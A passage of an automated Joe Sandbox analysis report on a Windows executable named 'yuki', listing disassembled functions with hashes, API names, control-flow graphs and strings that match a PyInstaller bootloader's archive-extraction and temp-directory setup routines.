                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                      • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                      • API String ID: 3458911817-239921721
                                                                                                      • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                      • Instruction ID: 674d4caa271279929684b1b1dd36e33ee1b56c0d16f77b1fd192124c8d75477c
                                                                                                      • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                      • Instruction Fuzzy Hash: 8651B332A1864286E730DF31EB995A96360FF88795F509136EA8DC3695DF3DED0087C8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                      • String ID:
                                                                                                      • API String ID: 2295610775-0
                                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                      • Instruction ID: a7a438972c14c609a89643bc60c01c4ac9779c83f873c70d7f5454c698a96f03
                                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                      • Instruction Fuzzy Hash: E3F0C832A1874286F7709F70B48C766B390AB94779F040335D9ED42AD4DF3CE049CA08
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 1010374628-0
                                                                                                      • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                      • Instruction ID: 38d4e0f30fb3cf025e343b6397285bf69b46dfab15de4f0fbb3f2dd477218416
                                                                                                      • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                      • Instruction Fuzzy Hash: 5302F321B1D68641FA719F31962C279A684AF01BA2F658635DDDEC73D1DF3EEC009388

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 331 7ff6c81f1950-7ff6c81f198b call 7ff6c81f45c0 334 7ff6c81f1991-7ff6c81f19d1 call 7ff6c81f7f90 331->334 335 7ff6c81f1c4e-7ff6c81f1c72 call 7ff6c81fc550 331->335 340 7ff6c81f1c3b-7ff6c81f1c3e call 7ff6c820004c 334->340 341 7ff6c81f19d7-7ff6c81f19e7 call 7ff6c82006d4 334->341 344 7ff6c81f1c43-7ff6c81f1c4b 340->344 346 7ff6c81f1a08-7ff6c81f1a24 call 7ff6c820039c 341->346 347 7ff6c81f19e9-7ff6c81f1a03 call 7ff6c8204f08 call 7ff6c81f2910 341->347 344->335 353 7ff6c81f1a45-7ff6c81f1a5a call 7ff6c8204f28 346->353 354 7ff6c81f1a26-7ff6c81f1a40 call 7ff6c8204f08 call 7ff6c81f2910 346->354 347->340 361 7ff6c81f1a5c-7ff6c81f1a76 call 7ff6c8204f08 call 7ff6c81f2910 353->361 362 7ff6c81f1a7b-7ff6c81f1b05 call 7ff6c81f1c80 * 2 call 7ff6c82006d4 call 7ff6c8204f44 353->362 354->340 361->340 375 7ff6c81f1b0a-7ff6c81f1b14 362->375 376 7ff6c81f1b35-7ff6c81f1b4e call 7ff6c820039c 375->376 377 7ff6c81f1b16-7ff6c81f1b30 call 7ff6c8204f08 call 7ff6c81f2910 375->377 383 7ff6c81f1b50-7ff6c81f1b6a call 7ff6c8204f08 call 7ff6c81f2910 376->383 384 7ff6c81f1b6f-7ff6c81f1b8b call 7ff6c8200110 376->384 377->340 383->340 391 7ff6c81f1b9e-7ff6c81f1bac 384->391 392 7ff6c81f1b8d-7ff6c81f1b99 call 7ff6c81f2710 384->392 391->340 393 7ff6c81f1bb2-7ff6c81f1bb9 391->393 392->340 396 7ff6c81f1bc1-7ff6c81f1bc7 393->396 398 7ff6c81f1be0-7ff6c81f1bef 396->398 399 7ff6c81f1bc9-7ff6c81f1bd6 396->399 398->398 400 7ff6c81f1bf1-7ff6c81f1bfa 398->400 399->400 401 7ff6c81f1c0f 400->401 402 7ff6c81f1bfc-7ff6c81f1bff 400->402 404 7ff6c81f1c11-7ff6c81f1c24 401->404 402->401 403 7ff6c81f1c01-7ff6c81f1c04 402->403 403->401 405 7ff6c81f1c06-7ff6c81f1c09 403->405 406 7ff6c81f1c2d-7ff6c81f1c39 404->406 407 7ff6c81f1c26 404->407 405->401 408 7ff6c81f1c0b-7ff6c81f1c0d 405->408 406->340 406->396 407->406 408->404
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF6C81F7F90: _fread_nolock.LIBCMT ref: 00007FF6C81F803A
                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF6C81F1A1B
                                                                                                        • Part of subcall function 00007FF6C81F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6C81F1B6A), ref: 00007FF6C81F295E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                      • Opcode ID: ed5d37bd12c92faad5b6bf746ee66ab535d4fcd70a2e81ebf99a2f5a44e873f3
                                                                                                      • Instruction ID: 8cd2bba1ee25aad4f3d28f026ca1f289b32ff800034553fbb91a1a0b97e2950f
                                                                                                      • Opcode Fuzzy Hash: ed5d37bd12c92faad5b6bf746ee66ab535d4fcd70a2e81ebf99a2f5a44e873f3
                                                                                                      • Instruction Fuzzy Hash: BD81BC71A0868386EB31DF34D1582B923E0AF98B86F504435E9CDC3B96DE3DE585C788

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 409 7ff6c81f1600-7ff6c81f1611 410 7ff6c81f1613-7ff6c81f161c call 7ff6c81f1050 409->410 411 7ff6c81f1637-7ff6c81f1651 call 7ff6c81f45c0 409->411 416 7ff6c81f162e-7ff6c81f1636 410->416 417 7ff6c81f161e-7ff6c81f1629 call 7ff6c81f2710 410->417 418 7ff6c81f1682-7ff6c81f169c call 7ff6c81f45c0 411->418 419 7ff6c81f1653-7ff6c81f1681 call 7ff6c8204f08 call 7ff6c81f2910 411->419 417->416 426 7ff6c81f169e-7ff6c81f16b3 call 7ff6c81f2710 418->426 427 7ff6c81f16b8-7ff6c81f16cf call 7ff6c82006d4 418->427 433 7ff6c81f1821-7ff6c81f1824 call 7ff6c820004c 426->433 434 7ff6c81f16d1-7ff6c81f16f4 call 7ff6c8204f08 call 7ff6c81f2910 427->434 435 7ff6c81f16f9-7ff6c81f16fd 427->435 442 7ff6c81f1829-7ff6c81f183b 433->442 448 7ff6c81f1819-7ff6c81f181c call 7ff6c820004c 434->448 436 7ff6c81f16ff-7ff6c81f170b call 7ff6c81f1210 435->436 437 7ff6c81f1717-7ff6c81f1737 call 7ff6c8204f44 435->437 444 7ff6c81f1710-7ff6c81f1712 436->444 449 7ff6c81f1761-7ff6c81f176c 437->449 450 7ff6c81f1739-7ff6c81f175c call 7ff6c8204f08 call 7ff6c81f2910 437->450 444->448 448->433 453 7ff6c81f1802-7ff6c81f180a call 7ff6c8204f30 449->453 454 7ff6c81f1772-7ff6c81f1777 449->454 462 7ff6c81f180f-7ff6c81f1814 450->462 453->462 457 7ff6c81f1780-7ff6c81f17a2 call 7ff6c820039c 454->457 464 7ff6c81f17a4-7ff6c81f17bc call 7ff6c8200adc 457->464 465 7ff6c81f17da-7ff6c81f17e6 call 7ff6c8204f08 457->465 462->448 470 7ff6c81f17c5-7ff6c81f17d8 call 7ff6c8204f08 464->470 471 7ff6c81f17be-7ff6c81f17c1 464->471 472 7ff6c81f17ed-7ff6c81f17f8 call 7ff6c81f2910 465->472 470->472 471->457 473 7ff6c81f17c3 471->473 476 7ff6c81f17fd 472->476 473->476 476->453
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                      • Opcode ID: 20e17bd6c553c2d1bb16f42c1bd2daa45422ba949397fd2f79efb246dcdc4b64
                                                                                                      • Instruction ID: 1f61f9f92ca61f99e196589f370ce7f4927ff81b288b5e5c7642c7113f909ebf
                                                                                                      • Opcode Fuzzy Hash: 20e17bd6c553c2d1bb16f42c1bd2daa45422ba949397fd2f79efb246dcdc4b64
                                                                                                      • Instruction Fuzzy Hash: B651D171B0864392EA31AF3195141AA63A0BF50BA6F504135EE8CC7BE2DF3DE545C788

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF6C81F3CBB), ref: 00007FF6C81F8704
                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6C81F3CBB), ref: 00007FF6C81F870A
                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6C81F3CBB), ref: 00007FF6C81F874C
                                                                                                        • Part of subcall function 00007FF6C81F8830: GetEnvironmentVariableW.KERNEL32(00007FF6C81F388E), ref: 00007FF6C81F8867
                                                                                                        • Part of subcall function 00007FF6C81F8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6C81F8889
                                                                                                        • Part of subcall function 00007FF6C8208238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C8208251
                                                                                                        • Part of subcall function 00007FF6C81F2810: MessageBoxW.USER32 ref: 00007FF6C81F28EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                      • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                      • Instruction ID: 6f6f87fdad47c19cce240d5dbaeabacc6498b5df5be717712781f5cf457f4247
                                                                                                      • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                      • Instruction Fuzzy Hash: A441A731A1969344FA30EF359A692BA12D1AF54BC6F504131ED8DC7BD6DE3CE506C388

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 756 7ff6c81f1210-7ff6c81f126d call 7ff6c81fbd80 759 7ff6c81f126f-7ff6c81f1296 call 7ff6c81f2710 756->759 760 7ff6c81f1297-7ff6c81f12af call 7ff6c8204f44 756->760 765 7ff6c81f12d4-7ff6c81f12e4 call 7ff6c8204f44 760->765 766 7ff6c81f12b1-7ff6c81f12cf call 7ff6c8204f08 call 7ff6c81f2910 760->766 772 7ff6c81f1309-7ff6c81f131b 765->772 773 7ff6c81f12e6-7ff6c81f1304 call 7ff6c8204f08 call 7ff6c81f2910 765->773 779 7ff6c81f1439-7ff6c81f144e call 7ff6c81fba60 call 7ff6c8204f30 * 2 766->779 774 7ff6c81f1320-7ff6c81f1345 call 7ff6c820039c 772->774 773->779 785 7ff6c81f1431 774->785 786 7ff6c81f134b-7ff6c81f1355 call 7ff6c8200110 774->786 793 7ff6c81f1453-7ff6c81f146d 779->793 785->779 786->785 792 7ff6c81f135b-7ff6c81f1367 786->792 794 7ff6c81f1370-7ff6c81f1398 call 7ff6c81fa1c0 792->794 797 7ff6c81f139a-7ff6c81f139d 794->797 798 7ff6c81f1416-7ff6c81f142c call 7ff6c81f2710 794->798 800 7ff6c81f1411 797->800 801 7ff6c81f139f-7ff6c81f13a9 797->801 798->785 800->798 802 7ff6c81f13d4-7ff6c81f13d7 801->802 803 7ff6c81f13ab-7ff6c81f13b9 call 7ff6c8200adc 801->803 805 7ff6c81f13ea-7ff6c81f13ef 802->805 806 7ff6c81f13d9-7ff6c81f13e7 call 7ff6c8219e30 802->806 807 7ff6c81f13be-7ff6c81f13c1 803->807 805->794 809 7ff6c81f13f5-7ff6c81f13f8 805->809 806->805 810 7ff6c81f13c3-7ff6c81f13cd call 7ff6c8200110 807->810 811 7ff6c81f13cf-7ff6c81f13d2 807->811 813 7ff6c81f140c-7ff6c81f140f 809->813 814 7ff6c81f13fa-7ff6c81f13fd 809->814 810->805 810->811 811->798 813->785 814->798 816 7ff6c81f13ff-7ff6c81f1407 814->816 816->774
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                      • Opcode ID: ef842027a1d970694cc0f789b50cc720652ec9763b74026d17365e7fd9a410f4
                                                                                                      • Instruction ID: 16f329d474741a9aae9b22887f81e09e7f39982332b3bfee08af902f508f0297
                                                                                                      • Opcode Fuzzy Hash: ef842027a1d970694cc0f789b50cc720652ec9763b74026d17365e7fd9a410f4
                                                                                                      • Instruction Fuzzy Hash: 8351E232A0868381E6319F31A5503BA62D1BF94BA6F944135ED8DC3BD5EF3CE542C748

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF6C820F0AA,?,?,-00000018,00007FF6C820AD53,?,?,?,00007FF6C820AC4A,?,?,?,00007FF6C8205F3E), ref: 00007FF6C820EE8C
                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF6C820F0AA,?,?,-00000018,00007FF6C820AD53,?,?,?,00007FF6C820AC4A,?,?,?,00007FF6C8205F3E), ref: 00007FF6C820EE98
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                      • Instruction ID: ff632488637f9902d19b3294b91c40f5263a679f360220abe1d80ff057561f0f
                                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                      • Instruction Fuzzy Hash: 67412335B19A4641EB35CF329A1857522D1BF08BE1F884139DD9DD7794EF3CE8858388

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF6C81F3804), ref: 00007FF6C81F36E1
                                                                                                      • GetLastError.KERNEL32(?,00007FF6C81F3804), ref: 00007FF6C81F36EB
                                                                                                        • Part of subcall function 00007FF6C81F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C81F3706,?,00007FF6C81F3804), ref: 00007FF6C81F2C9E
                                                                                                        • Part of subcall function 00007FF6C81F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C81F3706,?,00007FF6C81F3804), ref: 00007FF6C81F2D63
                                                                                                        • Part of subcall function 00007FF6C81F2C50: MessageBoxW.USER32 ref: 00007FF6C81F2D99
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                      • Instruction ID: a552e8a69ace4587b1d35e6aa93889216002ee3acd1c71d26fb3df3776ec9213
                                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                      • Instruction Fuzzy Hash: 00218071B1868341FA309F30E8143B622D0BFA8B9AF500236E5DDC29E5EE2CE505C748

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 901 7ff6c820ba5c-7ff6c820ba82 902 7ff6c820ba9d-7ff6c820baa1 901->902 903 7ff6c820ba84-7ff6c820ba98 call 7ff6c8204ee8 call 7ff6c8204f08 901->903 904 7ff6c820be77-7ff6c820be83 call 7ff6c8204ee8 call 7ff6c8204f08 902->904 905 7ff6c820baa7-7ff6c820baae 902->905 917 7ff6c820be8e 903->917 924 7ff6c820be89 call 7ff6c820a8e0 904->924 905->904 907 7ff6c820bab4-7ff6c820bae2 905->907 907->904 910 7ff6c820bae8-7ff6c820baef 907->910 913 7ff6c820bb08-7ff6c820bb0b 910->913 914 7ff6c820baf1-7ff6c820bb03 call 7ff6c8204ee8 call 7ff6c8204f08 910->914 920 7ff6c820bb11-7ff6c820bb17 913->920 921 7ff6c820be73-7ff6c820be75 913->921 914->924 922 7ff6c820be91-7ff6c820bea8 917->922 920->921 925 7ff6c820bb1d-7ff6c820bb20 920->925 921->922 924->917 925->914 928 7ff6c820bb22-7ff6c820bb47 925->928 930 7ff6c820bb49-7ff6c820bb4b 928->930 931 7ff6c820bb7a-7ff6c820bb81 928->931 934 7ff6c820bb4d-7ff6c820bb54 930->934 935 7ff6c820bb72-7ff6c820bb78 930->935 932 7ff6c820bb56-7ff6c820bb6d call 7ff6c8204ee8 call 7ff6c8204f08 call 7ff6c820a8e0 931->932 933 7ff6c820bb83-7ff6c820bbab call 7ff6c820d5fc call 7ff6c820a948 * 2 931->933 963 7ff6c820bd00 932->963 966 7ff6c820bbc8-7ff6c820bbf3 call 7ff6c820c284 933->966 967 7ff6c820bbad-7ff6c820bbc3 call 7ff6c8204f08 call 7ff6c8204ee8 933->967 934->932 934->935 937 7ff6c820bbf8-7ff6c820bc0f 935->937 940 7ff6c820bc8a-7ff6c820bc94 call 7ff6c821391c 937->940 941 7ff6c820bc11-7ff6c820bc19 937->941 952 7ff6c820bc9a-7ff6c820bcaf 940->952 953 7ff6c820bd1e 940->953 941->940 945 7ff6c820bc1b-7ff6c820bc1d 941->945 945->940 949 7ff6c820bc1f-7ff6c820bc35 945->949 949->940 954 7ff6c820bc37-7ff6c820bc43 949->954 952->953 958 7ff6c820bcb1-7ff6c820bcc3 GetConsoleMode 952->958 956 7ff6c820bd23-7ff6c820bd43 ReadFile 953->956 954->940 959 7ff6c820bc45-7ff6c820bc47 954->959 961 7ff6c820bd49-7ff6c820bd51 956->961 962 7ff6c820be3d-7ff6c820be46 GetLastError 956->962 958->953 964 7ff6c820bcc5-7ff6c820bccd 958->964 959->940 965 7ff6c820bc49-7ff6c820bc61 959->965 961->962 969 7ff6c820bd57 961->969 972 7ff6c820be48-7ff6c820be5e call 7ff6c8204f08 call 7ff6c8204ee8 962->972 973 7ff6c820be63-7ff6c820be66 962->973 974 7ff6c820bd03-7ff6c820bd0d call 7ff6c820a948 963->974 964->956 971 7ff6c820bccf-7ff6c820bcf1 ReadConsoleW 964->971 965->940 975 7ff6c820bc63-7ff6c820bc6f 965->975 966->937 967->963 979 7ff6c820bd5e-7ff6c820bd73 969->979 981 7ff6c820bd12-7ff6c820bd1c 971->981 982 7ff6c820bcf3 GetLastError 971->982 972->963 976 7ff6c820bcf9-7ff6c820bcfb call 7ff6c8204e7c 973->976 977 7ff6c820be6c-7ff6c820be6e 973->977 974->922 975->940 985 7ff6c820bc71-7ff6c820bc73 975->985 976->963 977->974 979->974 988 7ff6c820bd75-7ff6c820bd80 979->988 981->979 982->976 985->940 986 7ff6c820bc75-7ff6c820bc85 985->986 986->940 993 7ff6c820bda7-7ff6c820bdaf 988->993 994 7ff6c820bd82-7ff6c820bd9b call 7ff6c820b674 988->994 997 7ff6c820be2b-7ff6c820be38 call 7ff6c820b4b4 993->997 998 7ff6c820bdb1-7ff6c820bdc3 993->998 1001 7ff6c820bda0-7ff6c820bda2 994->1001 997->1001 1002 7ff6c820be1e-7ff6c820be26 998->1002 1003 7ff6c820bdc5 998->1003 1001->974 1002->974 1005 7ff6c820bdca-7ff6c820bdd1 1003->1005 1006 7ff6c820be0d-7ff6c820be18 1005->1006 1007 7ff6c820bdd3-7ff6c820bdd7 1005->1007 1006->1002 1008 7ff6c820bdd9-7ff6c820bde0 1007->1008 1009 7ff6c820bdf3 1007->1009 1008->1009 1011 7ff6c820bde2-7ff6c820bde6 1008->1011 1010 7ff6c820bdf9-7ff6c820be09 1009->1010 1010->1005 1013 7ff6c820be0b 1010->1013 1011->1009 1012 7ff6c820bde8-7ff6c820bdf1 1011->1012 1012->1010 1013->1002
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
